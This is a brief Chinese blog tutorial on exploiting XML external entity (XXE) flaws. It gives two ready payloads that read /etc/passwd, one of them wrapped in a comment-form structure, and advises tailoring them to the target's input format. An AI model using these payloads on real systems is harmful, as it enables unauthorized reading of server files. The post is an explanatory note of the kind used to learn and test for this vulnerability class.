XXE漏洞的利用
对于XXE漏洞的利用
在有些可以运行xml的对话框中,可以利用XXE漏洞,来查看一些文件
这是将passwd暴露出来的例子 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
原文中有更多的使用例子
但值得注意的是原文的例子不能直接拿来用,得根据对话框的格式来进行相关的修改
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment> <name>Joe Hamd</name> <author>Barry Clad</author> <com>&xxe;</com> </comment>
comment的内容就是的随机应变的内容
本文来自博客园,作者:野荷,转载请注明原文链接:https://www.cnblogs.com/jhinjax/p/17243636.html